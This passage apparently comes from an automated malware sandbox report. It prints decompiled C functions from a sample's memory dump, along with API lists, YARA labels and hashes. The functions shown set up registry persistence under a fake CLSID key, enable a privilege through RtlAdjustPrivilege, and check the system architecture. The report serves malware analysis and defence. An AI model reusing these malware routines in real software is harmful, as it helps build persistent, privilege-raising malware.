                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressHandleLibraryLoadModuleProc$ExceptionException@8RaiseThrow
                                                                                    • String ID: 0$ntdll.dll
                                                                                    • API String ID: 3650064235-1737626548
                                                                                    • Opcode ID: 45e9f1bb19afdd3feb9185550a6a16780f46d51cefcc0bc83d09d252a223533c
                                                                                    • Instruction ID: 04c92ce15d3cce83f065c59a537fd1e3f4cccaa7e7b0b735714807c2aa2409cf
                                                                                    • Opcode Fuzzy Hash: 45e9f1bb19afdd3feb9185550a6a16780f46d51cefcc0bc83d09d252a223533c
                                                                                    • Instruction Fuzzy Hash: 0D519371E04219ABEF618F61DC41BEFB7B8EF04308F5050A6E909A5140EB74BA84CF95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC6DB0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88registryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 95%
                                                                                    			E04EC6DB0(intOrPtr* __ecx, char __edx) {
				void* _v8;
				char _v12;
				char _v16;
				void* _t17;
				long _t18;
				char _t25;
				void* _t30;
				char* _t31;
				char* _t35;
				char* _t36;
				intOrPtr* _t40;

				_t36 = __ecx;
				_v12 = __edx;
				if(__ecx == 0) {
					return _t17;
				}
				_t40 = __ecx;
				_t30 = __ecx + 2;
				asm("o16 nop [eax+eax]");
				do {
					_t18 =  *_t40;
					_t40 = _t40 + 2;
				} while (_t18 != 0);
				if(_t40 - _t30 >> 1 < 1) {
					L11:
					return _t18;
				}
				_v8 = 0;
				if(RegCreateKeyExW(0x80000002, L"SOFTWARE\\Classes\\CLSID\\{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}", 0, 0, 0, 0xf013f, 0,  &_v8, 0) != 0) {
					L9:
					_v16 = _v12;
					_v8 = 0;
					_t18 = RegCreateKeyExW(0x80000002, L"SOFTWARE\\Classes\\CLSID\\{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}", 0, 0, 0, 0xf013f, 0,  &_v8, 0);
					if(_t18 == 0) {
						RegSetValueExW(_v8, "2", 0, 4,  &_v16, 4);
						_t18 = RegCloseKey(_v8);
					}
					goto L11;
				}
				_t31 = _t36;
				_t35 =  &(_t31[2]);
				do {
					_t25 =  *_t31;
					_t31 =  &(_t31[2]);
				} while (_t25 != 0);
				RegSetValueExW(_v8, "1", 0, 1, _t36, 2 + (_t31 - _t35 >> 1) * 2);
				RegCloseKey(_v8);
				goto L9;
			}














                                                                                    0x04ec6db7
                                                                                    0x04ec6db9
                                                                                    0x04ec6dbe
                                                                                    0x04ec6eaf
                                                                                    0x04ec6eaf
                                                                                    0x04ec6dc5
                                                                                    0x04ec6dc7
                                                                                    0x04ec6dca
                                                                                    0x04ec6dd0
                                                                                    0x04ec6dd0
                                                                                    0x04ec6dd3
                                                                                    0x04ec6dd6
                                                                                    0x04ec6de2
                                                                                    0x04ec6eaa
                                                                                    0x00000000
                                                                                    0x04ec6eaa
                                                                                    0x04ec6e0b
                                                                                    0x04ec6e16
                                                                                    0x04ec6e5d
                                                                                    0x04ec6e62
                                                                                    0x04ec6e80
                                                                                    0x04ec6e87
                                                                                    0x04ec6e8b
                                                                                    0x04ec6e9f
                                                                                    0x04ec6ea8
                                                                                    0x04ec6ea8
                                                                                    0x00000000
                                                                                    0x04ec6e8b
                                                                                    0x04ec6e18
                                                                                    0x04ec6e1a
                                                                                    0x04ec6e20
                                                                                    0x04ec6e20
                                                                                    0x04ec6e23
                                                                                    0x04ec6e26
                                                                                    0x04ec6e44
                                                                                    0x04ec6e53
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • RegCreateKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\CLSID\{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC},00000000,00000000,00000000,000F013F,00000000,04ECBF99,00000000,00000000,00000000), ref: 04EC6E12
                                                                                    • RegSetValueExW.ADVAPI32(00000000,04EFD09C,00000000,00000001,?,00000000), ref: 04EC6E44
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 04EC6E53
                                                                                    • RegCreateKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\CLSID\{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC},00000000,00000000,00000000,000F013F,00000000,00000000,00000000), ref: 04EC6E87
                                                                                    • RegSetValueExW.ADVAPI32(00000000,04EFD124,00000000,00000004,?,00000004), ref: 04EC6E9F
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 04EC6EA8
                                                                                    Strings
                                                                                    • SOFTWARE\Classes\CLSID\{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}, xrefs: 04EC6E01, 04EC6E76
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseCreateValue
                                                                                    • String ID: SOFTWARE\Classes\CLSID\{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}
                                                                                    • API String ID: 1818849710-2030040551
                                                                                    • Opcode ID: d07ea5b8e847f859fdd67be2074b392c9a802a9fcdb407a91c76af1f43de4a56
                                                                                    • Instruction ID: 92fa96b05eb8d37eb7e6542be74c569c8976e8aec664e8c3e9686a2a0c8444f6
                                                                                    • Opcode Fuzzy Hash: d07ea5b8e847f859fdd67be2074b392c9a802a9fcdb407a91c76af1f43de4a56
                                                                                    • Instruction Fuzzy Hash: 9F21BF75A40308FBEB209B58DD02FAEBB75EB84B04F20015AFE057B1D4D6B17A02DB54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EBA970, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71registryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 82%
                                                                                    			E04EBA970(void* __ebx, void* __ecx, void* __eflags, char* _a4, int _a8) {
				signed int _v8;
				char _v88;
				short _v608;
				void* _v612;
				void* __edi;
				void* __esi;
				signed int _t23;
				int _t31;
				struct _CRITICAL_SECTION* _t39;
				char* _t45;
				void* _t56;
				int _t58;
				void* _t61;
				void* _t64;
				signed int _t71;

				_t69 = _t71;
				_t23 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t23 ^ _t71;
				_t45 = _a4;
				_push(_t61);
				_t56 = __ecx;
				E04EC6010(_t45, L"Global",  &_v88, __ecx, _t61);
				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
				_v612 = 0;
				_t31 = RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0xf013f, 0,  &_v612, 0);
				if(_t31 != 0) {
					L2:
					return E04ED572E(_v8 ^ _t69);
				} else {
					RegSetValueExW(_v612, "1", _t31, 3, _t45, _a8);
					_t64 =  ==  ? 1 : 0;
					RegCloseKey(_v612);
					if(_t64 != 0) {
						CreateEventA(0, 1, 0, _t56 + 0xc);
						E04EDF0D8(0);
						asm("int3");
						asm("int3");
						_push(_t56);
						_t58 = 1;
						 *1 = 0x4efcf78;
						if( *0x00000025 == 0) {
							L10:
							_t39 = _t58 + 0x28;
							DeleteCriticalSection(_t39);
							return _t39;
						} else {
							_push(_t64);
							EnterCriticalSection(0x29);
							if( *0x00000025 != 0) {
								_t52 =  *0x00000041;
								 *0x00000025 = 0;
								if( *0x00000041 != 0) {
									E04ECFA50(_t52, 0x29);
									 *0x00000041 = 0;
								}
								LeaveCriticalSection(0x29);
								 *((intOrPtr*)( *_t58 + 4))();
								goto L10;
							} else {
								LeaveCriticalSection(0x29);
								DeleteCriticalSection(0x29);
								return 0x29;
							}
						}
					} else {
						goto L2;
					}
				}
			}


















                                                                                    0x04eba971
                                                                                    0x04eba979
                                                                                    0x04eba980
                                                                                    0x04eba984
                                                                                    0x04eba98a
                                                                                    0x04eba98c
                                                                                    0x04eba993
                                                                                    0x04eba9a8
                                                                                    0x04eba9b9
                                                                                    0x04eba9d6
                                                                                    0x04eba9de
                                                                                    0x04ebaa12
                                                                                    0x04ebaa24
                                                                                    0x04eba9e0
                                                                                    0x04eba9f2
                                                                                    0x04ebaa05
                                                                                    0x04ebaa08
                                                                                    0x04ebaa10
                                                                                    0x04ebaa31
                                                                                    0x04ebaa39
                                                                                    0x04ebaa3e
                                                                                    0x04ebaa3f
                                                                                    0x04ebaa40
                                                                                    0x04ebaa41
                                                                                    0x04ebaa47
                                                                                    0x04ebaa4d
                                                                                    0x04ebaa9d
                                                                                    0x04ebaa9d
                                                                                    0x04ebaaa1
                                                                                    0x04ebaaa8
                                                                                    0x04ebaa4f
                                                                                    0x04ebaa4f
                                                                                    0x04ebaa54
                                                                                    0x04ebaa5e
                                                                                    0x04ebaa74
                                                                                    0x04ebaa77
                                                                                    0x04ebaa80
                                                                                    0x04ebaa82
                                                                                    0x04ebaa87
                                                                                    0x04ebaa87
                                                                                    0x04ebaa8f
                                                                                    0x04ebaa99
                                                                                    0x00000000
                                                                                    0x04ebaa60
                                                                                    0x04ebaa61
                                                                                    0x04ebaa6c
                                                                                    0x04ebaa73
                                                                                    0x04ebaa73
                                                                                    0x04ebaa5e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebaa10

                                                                                    APIs
                                                                                      • Part of subcall function 04EC6010: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,00000378), ref: 04EC61B1
                                                                                      • Part of subcall function 04EC6010: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 04EC61DF
                                                                                      • Part of subcall function 04EC6010: RegCloseKey.ADVAPI32(?), ref: 04EC61F5
                                                                                    • wsprintfW.USER32 ref: 04EBA9A8
                                                                                    • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 04EBA9D6
                                                                                    • RegSetValueExW.ADVAPI32(?,04EFD09C,00000000,00000003,?,?), ref: 04EBA9F2
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 04EBAA08
                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 04EBAA31
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseCreateValue$EventOpenQuerywsprintf
                                                                                    • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                                                    • API String ID: 2801368686-1865207932
                                                                                    • Opcode ID: e27687ce1986cb78a5729b66c4f330794deb0bc7d74d4b0e6d60d685a08a373e
                                                                                    • Instruction ID: f86be644d39147a0111d7fb7d439d5c94ed81de672d3e65d998bfeb8b45f3e8c
                                                                                    • Opcode Fuzzy Hash: e27687ce1986cb78a5729b66c4f330794deb0bc7d74d4b0e6d60d685a08a373e
                                                                                    • Instruction Fuzzy Hash: 39217271A0121CBBDB20DFA5EC89FABBB7CEF44715F104065BE09E6044D675AE44DBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC5D00, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 61%
                                                                                    			E04EC5D00(void* __edi, void* __esi) {
				signed int _v8;
				void _v32;
				signed int _t6;
				_Unknown_base(*)()* _t11;
				void* _t23;
				signed int _t30;

				_t32 = (_t30 & 0xfffffff8) - 0x20;
				_t6 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t6 ^ (_t30 & 0xfffffff8) - 0x00000020;
				_t23 = OpenProcess(0x400, 0, GetCurrentProcessId());
				if(_t23 != 0) {
					_t11 = GetProcAddress(GetModuleHandleW(L"ntdll"), "NtQueryInformationProcess");
					if(_t11 != 0) {
						 *_t11(_t23, 0,  &_v32, 0x18, 0);
						_t27 =  ==  ? _v32 : 0;
					}
					CloseHandle(_t23);
					return E04ED572E(_v8 ^ _t32);
				} else {
					return E04ED572E(_v8 ^ _t32);
				}
			}









                                                                                    0x04ec5d06
                                                                                    0x04ec5d09
                                                                                    0x04ec5d10
                                                                                    0x04ec5d2b
                                                                                    0x04ec5d2f
                                                                                    0x04ec5d53
                                                                                    0x04ec5d5b
                                                                                    0x04ec5d69
                                                                                    0x04ec5d6d
                                                                                    0x04ec5d6d
                                                                                    0x04ec5d73
                                                                                    0x04ec5d8b
                                                                                    0x04ec5d31
                                                                                    0x04ec5d41
                                                                                    0x04ec5d41

                                                                                    APIs
                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,?,?,?,?,?,04EC6FAC,00000000,74E04DC0), ref: 04EC5D18
                                                                                    • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,04EC6FAC,00000000,74E04DC0), ref: 04EC5D25
                                                                                    • GetModuleHandleW.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,?,04EC6FAC,00000000,74E04DC0), ref: 04EC5D4C
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 04EC5D53
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,04EC6FAC,00000000,74E04DC0), ref: 04EC5D73
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: HandleProcess$AddressCloseCurrentModuleOpenProc
                                                                                    • String ID: NtQueryInformationProcess$ntdll
                                                                                    • API String ID: 2704359807-2585995557
                                                                                    • Opcode ID: f2db294b64dc9af3de3383bd543212aa32c2d321ee6e2af97f7fa157df30ae3a
                                                                                    • Instruction ID: 5f8360809f9eb1e07029a4f53731b37d4d7f6e7d788388246992de125944ecd8
                                                                                    • Opcode Fuzzy Hash: f2db294b64dc9af3de3383bd543212aa32c2d321ee6e2af97f7fa157df30ae3a
                                                                                    • Instruction Fuzzy Hash: E401D8323003056BD310AF66AC0AB3B77A9EFC8616F00451DFE59D7180DE64ED0187D6
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC4160, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 52libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 38%
                                                                                    			E04EC4160(void* __ebx, char _a4) {
				void* __ecx;
				void* __edi;
				void* __esi;
				char _t7;
				_Unknown_base(*)()* _t10;
				int _t14;
				void* _t18;
				char* _t19;
				void* _t21;
				void* _t22;
				void* _t23;
				intOrPtr* _t24;

				_t18 = __ebx;
				_t7 = _a4;
				_t24 = _t19;
				 *_t24 = 0x4efd8b0;
				 *((intOrPtr*)(_t24 + 4)) = _t7;
				 *((intOrPtr*)(_t7 + 0x38)) = _t24;
				 *((intOrPtr*)(_t24 + 8)) = CreateEventW(0, 1, 0, 0);
				 *_t24 = 0x4efde4c;
				_t10 = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlAdjustPrivilege");
				if(_t10 == 0) {
					E04ECAA70(_t24);
				} else {
					_t19 =  &_a4;
					 *_t10(0x14, 1, 0, _t19);
				}
				_t23 = E04EC4BC0(_t18, _t21, _t22, _t24);
				if(_t23 != 0) {
					_t14 = LocalSize(_t23);
					_push(_t19);
					_push(0x3f);
					_push(_t14);
					_push(_t23);
					E04EB1C60( *((intOrPtr*)(_t24 + 4)));
					LocalFree(_t23);
				}
				return _t24;
			}















                                                                                    0x04ec4160
                                                                                    0x04ec4164
                                                                                    0x04ec416b
                                                                                    0x04ec4173
                                                                                    0x04ec4179
                                                                                    0x04ec417c
                                                                                    0x04ec418a
                                                                                    0x04ec418d
                                                                                    0x04ec419f
                                                                                    0x04ec41a7
                                                                                    0x04ec41b7
                                                                                    0x04ec41a9
                                                                                    0x04ec41a9
                                                                                    0x04ec41b3
                                                                                    0x04ec41b3
                                                                                    0x04ec41c1
                                                                                    0x04ec41c5
                                                                                    0x04ec41c8
                                                                                    0x04ec41ce
                                                                                    0x04ec41d2
                                                                                    0x04ec41d4
                                                                                    0x04ec41d5
                                                                                    0x04ec41d6
                                                                                    0x04ec41dc
                                                                                    0x04ec41dc
                                                                                    0x04ec41e8

                                                                                    APIs
                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,04EB9CBC,?,Function_000568D8,00000000), ref: 04EC417F
                                                                                    • LoadLibraryA.KERNEL32(ntdll.dll,?,?,?,?,04EB9CBC,?,Function_000568D8,00000000), ref: 04EC4193
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlAdjustPrivilege), ref: 04EC419F
                                                                                    • LocalSize.KERNEL32 ref: 04EC41C8
                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F,?,?,?,?,?,04EB9CBC,?,Function_000568D8,00000000), ref: 04EC41DC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Local$AddressCreateEventFreeLibraryLoadProcSize
                                                                                    • String ID: RtlAdjustPrivilege$ntdll.dll
                                                                                    • API String ID: 3057455304-64178277
                                                                                    • Opcode ID: 8d75aaca56e0cf7822787a05dfc10afd1d13e0b8e11662e066031f0e63018d34
                                                                                    • Instruction ID: adb3f3c93fb5df75358e03c79d6b60395fc4d619a05caba62cc5226d95b58e51
                                                                                    • Opcode Fuzzy Hash: 8d75aaca56e0cf7822787a05dfc10afd1d13e0b8e11662e066031f0e63018d34
                                                                                    • Instruction Fuzzy Hash: 8601F1752403007FE2249FA59C5AFBB7AA8EB84B41F10111DF7568B1C0EEB0B8008BA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC5980, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 48libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 37%
                                                                                    			E04EC5980(void* __ecx) {
				char _v8;
				intOrPtr _v12;
				char _v44;
				_Unknown_base(*)()* _t10;
				intOrPtr _t13;
				_Unknown_base(*)()* _t15;
				void* _t19;

				_t19 = __ecx;
				_t10 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetNativeSystemInfo");
				if(_t10 == 0) {
					L6:
					return 0;
				} else {
					asm("xorps xmm0, xmm0");
					_v12 = 0;
					asm("movups [ebp-0x28], xmm0");
					asm("movups [ebp-0x18], xmm0");
					 *_t10( &_v44);
					_t13 = _v44;
					if(_t13 == 6 || _t13 == 9) {
						_v8 = 0;
						_t15 = GetProcAddress(LoadLibraryA("kernel32.dll"), "IsWow64Process");
						if(_t15 != 0) {
							 *_t15(_t19,  &_v8);
						}
						return 0 | _v8 == 0x00000000;
					} else {
						goto L6;
					}
				}
			}










                                                                                    0x04ec5991
                                                                                    0x04ec599a
                                                                                    0x04ec59a2
                                                                                    0x04ec5a01
                                                                                    0x04ec5a07
                                                                                    0x04ec59a4
                                                                                    0x04ec59a4
                                                                                    0x04ec59a7
                                                                                    0x04ec59b2
                                                                                    0x04ec59b6
                                                                                    0x04ec59ba
                                                                                    0x04ec59bc
                                                                                    0x04ec59c3
                                                                                    0x04ec59d5
                                                                                    0x04ec59e3
                                                                                    0x04ec59eb
                                                                                    0x04ec59f2
                                                                                    0x04ec59f2
                                                                                    0x04ec5a00
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec59c3

                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetNativeSystemInfo,00000000,?,?,?,?,?,?,?,?,?,04EC5AA3,?,?,00000000), ref: 04EC5993
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 04EC599A
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,IsWow64Process), ref: 04EC59DC
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 04EC59E3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: GetNativeSystemInfo$IsWow64Process$kernel32.dll
                                                                                    • API String ID: 2574300362-3073145729
                                                                                    • Opcode ID: 9539a7145d51efcb6f82792707973436b4fef51f7b54f30bb42408bdc3b618fe
                                                                                    • Instruction ID: 034cb19cd0edeaae206d91620bac842548ec9f456cdac64f0c260b43cb6b053e
                                                                                    • Opcode Fuzzy Hash: 9539a7145d51efcb6f82792707973436b4fef51f7b54f30bb42408bdc3b618fe
                                                                                    • Instruction Fuzzy Hash: AD01F732E51309ABCB14DFF19D88AFE7B78DB58215F046259E91AE2000EA78B981C750
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ED1820, Relevance: 12.1, APIs: 8, Instructions: 123networktimeCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 70%
                                                                                    			E04ED1820(intOrPtr __ecx, intOrPtr* _a4, signed char _a7) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _t36;
				intOrPtr _t38;
				void* _t43;
				long _t48;
				intOrPtr _t51;
				intOrPtr _t56;
				signed char _t63;
				intOrPtr _t66;
				struct _CRITICAL_SECTION* _t75;

				_t36 = _a4;
				_t51 = __ecx;
				_t63 =  *((intOrPtr*)(_t36 + 2));
				_t66 =  *((intOrPtr*)(_t36 + 8));
				_v8 =  *((intOrPtr*)(_t36 + 4));
				_v12 = __ecx;
				_a7 = _t63;
				if( *_t36 != 0xbb4f || _t63 != 1 || (_t63 & 0x000000fe) != 0) {
					__imp__#112(0xd);
					return 2;
				} else {
					_t75 = __ecx + 0x28;
					EnterCriticalSection(_t75);
					_t38 =  *((intOrPtr*)(_t51 + 0x24));
					if(_t38 != 0) {
						if(_t38 != 2) {
							_t56 =  *((intOrPtr*)(_t51 + 0x20));
							if(_t56 != 0) {
								if(_v8 != _t56) {
									goto L21;
								} else {
									goto L18;
								}
							} else {
								 *((intOrPtr*)(_t51 + 0x20)) = _v8;
								 *((intOrPtr*)(_t51 + 0x10)) = timeGetTime();
								 *((intOrPtr*)(_t51 + 0x14)) = 0;
								L18:
								if(_t66 !=  *((intOrPtr*)(_t51 + 0x1c))) {
									if(_t66 == 0) {
										goto L11;
									} else {
										goto L21;
									}
								} else {
									 *((intOrPtr*)(_t51 + 0x24)) = 2;
									asm("sbb edi, edi");
									_t43 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t51 + 4)) + 4)) + 0x9c))( ~( *(_t51 + 8)) &  *(_t51 + 8) + 0x00000004);
									LeaveCriticalSection(_t75);
									return _t43;
								}
							}
						} else {
							if(_v8 !=  *((intOrPtr*)(_t51 + 0x20))) {
								L21:
								_push(0x2746);
								goto L22;
							} else {
								if(_t66 ==  *((intOrPtr*)(_t51 + 0x1c))) {
									L11:
									LeaveCriticalSection(_t75);
									if( *((intOrPtr*)(_t51 + 0xc)) == 0 && _a7 == 1) {
										 *((intOrPtr*)(_t51 + 0xc)) = 1;
									}
									E04ED1A20(_t51);
									return 0;
								} else {
									if(_t66 != 0) {
										goto L21;
									} else {
										_t48 = timeGetTime();
										if(_t48 -  *((intOrPtr*)(_t51 + 0x18)) >  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))) + 0x54))() + _t49) {
											goto L21;
										} else {
											_t51 = _v12;
											goto L11;
										}
									}
								}
							}
						}
					} else {
						_push(0x139f);
						L22:
						__imp__#112();
						LeaveCriticalSection(_t75);
						return 2;
					}
				}
			}














                                                                                    0x04ed1826
                                                                                    0x04ed182a
                                                                                    0x04ed1833
                                                                                    0x04ed1836
                                                                                    0x04ed1839
                                                                                    0x04ed1841
                                                                                    0x04ed1844
                                                                                    0x04ed184a
                                                                                    0x04ed1978
                                                                                    0x04ed1988
                                                                                    0x04ed1862
                                                                                    0x04ed1863
                                                                                    0x04ed1867
                                                                                    0x04ed186d
                                                                                    0x04ed1872
                                                                                    0x04ed1881
                                                                                    0x04ed18ed
                                                                                    0x04ed18f2
                                                                                    0x04ed190f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ed18f4
                                                                                    0x04ed18f7
                                                                                    0x04ed1900
                                                                                    0x04ed1903
                                                                                    0x04ed1911
                                                                                    0x04ed1914
                                                                                    0x04ed194e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ed1916
                                                                                    0x04ed191f
                                                                                    0x04ed192d
                                                                                    0x04ed1932
                                                                                    0x04ed193b
                                                                                    0x04ed1949
                                                                                    0x04ed1949
                                                                                    0x04ed1914
                                                                                    0x04ed1883
                                                                                    0x04ed1889
                                                                                    0x04ed1954
                                                                                    0x04ed1954
                                                                                    0x00000000
                                                                                    0x04ed188f
                                                                                    0x04ed1892
                                                                                    0x04ed18c1
                                                                                    0x04ed18c2
                                                                                    0x04ed18cc
                                                                                    0x04ed18d4
                                                                                    0x04ed18d4
                                                                                    0x04ed18dd
                                                                                    0x04ed18ea
                                                                                    0x04ed1894
                                                                                    0x04ed1896
                                                                                    0x00000000
                                                                                    0x04ed189c
                                                                                    0x04ed189f
                                                                                    0x04ed18b8
                                                                                    0x00000000
                                                                                    0x04ed18be
                                                                                    0x04ed18be
                                                                                    0x00000000
                                                                                    0x04ed18be
                                                                                    0x04ed18b8
                                                                                    0x04ed1896
                                                                                    0x04ed1892
                                                                                    0x04ed1889
                                                                                    0x04ed1874
                                                                                    0x04ed1874
                                                                                    0x04ed1959
                                                                                    0x04ed1959
                                                                                    0x04ed1965
                                                                                    0x04ed1973
                                                                                    0x04ed1973
                                                                                    0x04ed1872

                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(?,?), ref: 04ED1867
                                                                                    • timeGetTime.WINMM ref: 04ED189F
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 04ED18C2
                                                                                    • WSASetLastError.WS2_32(00002746), ref: 04ED1959
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 04ED1965
                                                                                    • WSASetLastError.WS2_32(0000000D), ref: 04ED1978
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$ErrorLastLeave$EnterTimetime
                                                                                    • String ID:
                                                                                    • API String ID: 1279346950-0
                                                                                    • Opcode ID: 4b007436e140c8a220e7c9c1181f9089ae24caf127754bd5730a066d7e7b0a15
                                                                                    • Instruction ID: 940fc27847f0c5288c19583c6ba152b2a1e6cbad37763a43decb7368417d2881
                                                                                    • Opcode Fuzzy Hash: 4b007436e140c8a220e7c9c1181f9089ae24caf127754bd5730a066d7e7b0a15
                                                                                    • Instruction Fuzzy Hash: D441E2766002009FDF10CF69D4847A9F7A5EF88325F1091AAEC09DB24ED735E846CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB4670, Relevance: 12.1, APIs: 8, Instructions: 114stringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 88%
                                                                                    			E04EB4670(void* __ecx, void* __eflags, WCHAR* _a4) {
				signed char _t21;
				signed int _t27;
				signed int _t28;
				WCHAR* _t30;
				void* _t37;
				WCHAR* _t38;
				signed int _t39;
				WCHAR* _t40;
				WCHAR* _t41;
				WCHAR* _t42;

				_t37 = __ecx;
				_t41 = _a4;
				_push(2 + lstrlenW(_t41) * 2);
				_t40 = E04EDEBA9(_t37);
				if(_t40 != 0) {
					lstrcpyW(_t40, _t41);
					_t42 = _t40;
					if( *_t40 != 0x5c || _t40[1] != 0x5c) {
						if(_t40[1] == 0x3a) {
							_t27 = _t40[2] & 0x0000ffff;
							_t11 =  &(_t40[2]); // 0x4
							_t42 = _t11;
							if(_t27 != 0 && _t27 == 0x5c) {
								_t42 =  &(_t42[1]);
							}
						}
					} else {
						_t28 = _t40[2] & 0x0000ffff;
						_t6 =  &(_t40[2]); // 0x4
						_t38 = _t6;
						if(_t28 != 0) {
							while(_t28 != 0x5c) {
								_t38 = CharNextW(_t38);
								_t28 =  *_t38 & 0x0000ffff;
								if(_t28 != 0) {
									continue;
								}
								goto L7;
							}
						}
						L7:
						_t7 =  &(_t38[1]); // 0x2
						_t30 =  ==  ? _t38 : _t7;
						if( *_t30 != 0) {
							_t39 =  *_t30 & 0x0000ffff;
							while(_t39 != 0x5c) {
								_t30 = CharNextW(_t30);
								_t39 =  *_t30 & 0x0000ffff;
								if(_t39 != 0) {
									continue;
								}
								goto L11;
							}
						}
						L11:
						_t8 =  &(_t30[1]); // 0x2
						_t42 =  ==  ? _t30 : _t8;
					}
					if( *_t42 == 0) {
						L26:
						E04EDE947(_t40);
						return 1;
					} else {
						do {
							if( *_t42 != 0x5c) {
								goto L25;
							} else {
								 *_t42 = 0;
								_t21 = GetFileAttributesW(_t40);
								if(_t21 != 0xffffffff) {
									if((_t21 & 0x00000010) == 0) {
										goto L22;
									} else {
										goto L24;
									}
								} else {
									if(CreateDirectoryW(_t40, 0) != 0 || GetLastError() == 0xb7) {
										L24:
										 *_t42 = 0x5c;
										goto L25;
									} else {
